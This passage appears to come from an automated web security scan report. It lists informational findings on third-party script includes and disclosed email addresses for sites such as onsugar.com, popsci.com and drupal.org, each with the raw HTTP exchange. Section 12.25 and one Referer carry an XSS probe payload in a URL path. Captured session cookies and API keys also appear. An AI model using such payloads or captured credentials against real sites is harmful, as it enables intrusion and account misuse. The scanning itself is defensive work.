<script type="text/javascript" src="http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml?load=persistent&profile=mtv_co_uk_persistent" id="MTVNI-GEO-JS"></script>
<script type="text/javascript" src="http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml?load=advisory&profile=mtv_co_uk" id="MTVNI-GEO-JS"></script>

<script type="text/JavaScript" src="http://btg.mtvnservices.com/aria/coda.html?site=mtv.co.uk"></script>
...[SNIP]...
</p>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://f21.360tag.com/MTV/Tg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js">
{lang: 'en-GB'}
</script>
...[SNIP]...

12.22. http://www.nowpublic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<script type="text/javascript" src="http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic#width=300" id="examiner-pajita"></script>
...[SNIP]...
<!-- BEGIN STANDARD TAG - popunder only - ROS: Run-of-site - DO NOT MODIFY -->
<script type="text/javascript" src="http://adserving.cpxadroit.com/tags3/nowpublic_cpop.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!--Audience Science Page Tag ... Examiner --><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07610&amp;bpid=S0277"></script>
...[SNIP]...
</script>
<script src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
</script>
<script src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...

12.23. http://www.observer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.observer.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.observer.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:06 GMT
Server: VoxCAST
Set-Cookie: visitor_page_count=1.5; expires=Mon, 12-Sep-2011 12:45:39 GMT; path=/
X-Powered-By: PHP/5.2.6-1+lenny10
X-Head-Server: Linux web7.observermediagroup.com 2.6.26-1-amd64 #1 SMP Sat Jan 10 17:57:00 UTC 2009 x86_64
X-Pingback: http://www.observer.com/xmlrpc.php
X-Cache: HIT from VoxCAST
Age: 148
Content-Length: 63799
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML>
<html dir="ltr" lang="en-US">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!--[if lt IE 9]>
<script src="http://html5shim.google
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Place this tag in your head or just before your close body tag -->
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

12.24. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /modules/facebook_connect/xd_receiver.php HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=225065900
Expires:
Pragma:
Vary:
Vary: Accept-Encoding
Content-type: text/html
Date: Mon, 12 Sep 2011 13:03:52 GMT
Server: lighttpd/1.4.26
Content-Length: 636


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
XD) receiver page. It needs to be placed on your domain so that the Javascript
library can communicate within the iframe permission model. Put it here:

http://www.example.com/xd_receiver.php
-->

<script src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js' type='text/javascript'></script>
...[SNIP]...

12.25. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832630%7C5CKyG59MaJD7bSL%2BWHYWGqeAyMWC71WkfTqG%2FgrlKsXzqjYH8JcN%2BVHCKe1sQLdwNRmlR66qd%2BN6nGNdxVd%2BTEYtwVmgVvDNddwciSAOcL%2FsjPvmppJcUaHyoyNVEQt4%2F2BBcC6BoZQb9K%2F6t979ZN1XHdoJkpX2z8GxZjTEJ6rnzryCKtBnna0nrKS08GlTS6M0J3weSHeuZzKDMs35tw%3D%3D%7C1a48544dabced6305ba059d446818611fec5a1dc; expires=Wed, 05-Oct-2011 16:37:10 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:50 GMT
Server: lighttpd/1.4.26
Content-Length: 7845

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

12.26. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div id="job-listing-block">
<script type="text/javascript" src="http://edge.jobthread.com/jobs.popsci.com/feeds/jobroll/?num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- END Nielsen Online SiteCensus V6.0 --><script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

12.27. http://www.popsugar.com/community/welcome

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 65851
Date: Mon, 12 Sep 2011 12:47:53 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831673%7CVtj50HZwVAf6XzfIzt45pAblVAlc658GleP1Nc35FHk5BZz8pEix8Xg9Ase9%2BJLn7b%2F9pIbiJ0AODiCY4BZ%2BnHUcb3CfiqQFmj9iC2QEl%2FzrN4OjXbIVbnYL7TtT%2FNDOa20QiTZ69ZIOPH8NHKmxFb%2FNBZJzlZW52yg3LBuLhLbFzZXUJa5yM5PtJvnVaNds%2FFv5HCzpMbHW3EMGGJZjog%3D%3D%7C111c881ae8b070d6503319a594ad0a72df3828a0; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<head>
<script type="text/javascript" src="http://media29.onsugar.com/v645/static/js/onsugar.js"></script>
<script src="http://media21.onsugar.com/v0/static/js/sso.js" type="text/javascript"></script>
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community/welcome">
<script src="http://media8.onsugar.com/v645/static/js/1.6.1.0/prototype.js" type="text/javascript"></script>
<script type="text/javascript" src=http://media35.onsugar.com/v645/static/js/clickTracker.js></script>
<script type="text/javascript" src="http://media3.onsugar.com/v645/static/js/prototype-ui/lib/effects.js"></script>
<script type="text/javascript" src="http://media3.onsugar.com/v645/static/js/prototype-ui/dist/carousel.js"></script>
<script src="http://media22.onsugar.com/v645/static/js/livepipe/livepipe.js" type="text/javascript"></script>
<script src="http://media31.onsugar.com/v645/static/js/livepipe/window.js" type="text/javascript"></script>

<script type="text/javascript" src="http://media28.onsugar.com/v645/static/js/drupal.js"></script>
<script type="text/javascript" src="http://media26.onsugar.com/v645/static/js/autocomplete.js"></script>
<script type="text/javascript" src="http://media20.onsugar.com/v645/themes/onsugar_themes/sugar2010/js/sugar.js"></script>
<script type="text/javascript" src="http://media29.onsugar.com/v645/themes/onsugar_themes/sugar/js/float.js"></script>
<script type="text/javascript" src="http://media7.onsugar.com/v645/themes/onsugar_themes/sugar2010/js/sugar-ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://bit.ly/javascript-api.js?version=2.0.1&amp;login=freshguide&amp;apiKey=R_b2b4fc2ea3cb442b96cb24de917e3b35"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://media3.onsugar.com/v645/static/js/fbconnect.js" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>
...[SNIP]...
</script>
<script src="http://widgets.getglue.com/checkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...

12.28. http://www.symantec.com/connect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:28:52 +0000
Vary: Cookie
ETag: "1315830532"
Content-Type: text/html; charset=utf-8
X-Varnish: 1371254795 1371243899
X-Varnish-Cache: HIT
X-Varnish-Hits: 220
Vary: Accept-Encoding
Content-Length: 80288
Cache-Control: public, max-age=2472
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

13. Email addresses disclosed
There are 20 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


13.1. http://drupal.org/node/101494

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupal.org
Path:   /node/101494

Issue detail

The following email address was disclosed in the response:

Request

GET /node/101494 HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Referer: http://drupal.org/security-team
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.22.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:58:08 +0000
Cache-Control: public, max-age=60
ETag: "1315832288-1"
Set-Cookie: SESS797294cd3a93256631fb852630ae867a=deleted; expires=Sun, 12-Sep-2010 12:58:07 GMT; path=/; domain=.drupal.org; httponly
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19351
Date: Mon, 12 Sep 2011 12:58:08 GMT
X-Varnish: 550052613
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www6.drupal.org
X-Cache: MISS

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:security@drupal.org" rel="nofollow">security@drupal.org</a>
...[SNIP]...

13.2. http://drupal.org/search/apachesolr_multisitesearch/xss%20sql%20injection

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupal.org
Path:   /search/apachesolr_multisitesearch/xss%20sql%20injection

Issue detail

The following email address was disclosed in the response:

Request

GET /search/apachesolr_multisitesearch/xss%20sql%20injection HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Referer: http://drupal.org/security
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.12.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:57:47 +0000
Cache-Control: public, max-age=60
ETag: "1315832267-1"
Set-Cookie: SESS797294cd3a93256631fb852630ae867a=deleted; expires=Sun, 12-Sep-2010 12:57:46 GMT; path=/; domain=.drupal.org; httponly
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 36490
Date: Mon, 12 Sep 2011 12:57:47 GMT
X-Varnish: 1469471826
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www5.drupal.org
X-Cache: MISS

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-T
...[SNIP]...
<a href="/user/227" title="View user profile.">killes@www.drop.org</a>
...[SNIP]...

13.3. http://drupal.org/security-team

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupal.org
Path:   /security-team

Issue detail

The following email address was disclosed in the response:

Request

GET /security-team HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Referer: http://drupal.org/security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=267740763.847546434.1315849637.1315849637.1315849637.1; __utmb=267740763.20.10.1315849637; __utmc=267740763; __utmz=267740763.1315849637.1.1.utmcsr=ciphertex.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/contact; __utmv=267740763.anonymous%20user

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:57:59 +0000
Cache-Control: public, max-age=60
ETag: "1315832279-1"
Set-Cookie: SESS797294cd3a93256631fb852630ae867a=deleted; expires=Sun, 12-Sep-2010 12:57:58 GMT; path=/; domain=.drupal.org; httponly
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 20663
Date: Mon, 12 Sep 2011 12:57:59 GMT
X-Varnish: 550052168
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: www6.drupal.org
X-Cache: MISS

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:security@drupal.org" rel="nofollow">security@drupal.org</a>
...[SNIP]...
<a href="mailto:security@drupal.org" rel="nofollow">security@drupal.org</a>
...[SNIP]...

13.4. http://media26.onsugar.com/v645/static/js/scriptaculous-1.8.3/controls.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media26.onsugar.com
Path:   /v645/static/js/scriptaculous-1.8.3/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /v645/static/js/scriptaculous-1.8.3/controls.js HTTP/1.1
Host: media26.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
Last-Modified: Thu, 11 Mar 2010 21:20:10 GMT
Server: lighttpd/1.4.26
Vary: Accept-Encoding
Content-Length: 34787
Cache-Control: max-age=1209600
Date: Mon, 12 Sep 2011 13:03:50 GMT
Connection: close

// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2009 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

13.5. http://mydirtbike.com/sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mydirtbike.com
Path:   /sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js?Y HTTP/1.1
Host: mydirtbike.com
Proxy-Connection: keep-alive
Referer: http://mydirtbike.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS430a6cc0ebd5514ad5b74d956bca3e8e=sbcql40odpvg8rtdlc43igs7a2

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:00 GMT
Server: Apache/2.2.17 (Ubuntu)
Last-Modified: Tue, 26 Apr 2011 09:46:07 GMT
ETag: "1d20410-2444-4a1cf317df022"
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Mon, 26 Sep 2011 12:49:00 GMT
Vary: Accept-Encoding
Content-Length: 9284
Content-Type: application/javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V)
...[SNIP]...

13.6. http://research.yahoo.com/themes/yresearch/style-1.1.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.yahoo.com
Path:   /themes/yresearch/style-1.1.css

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/yresearch/style-1.1.css HTTP/1.1
Host: research.yahoo.com
Proxy-Connection: keep-alive
Referer: http://research.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; ydrupal=5ef1f7cc0e5b3a853c4b1d0deaa44289

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:27 GMT
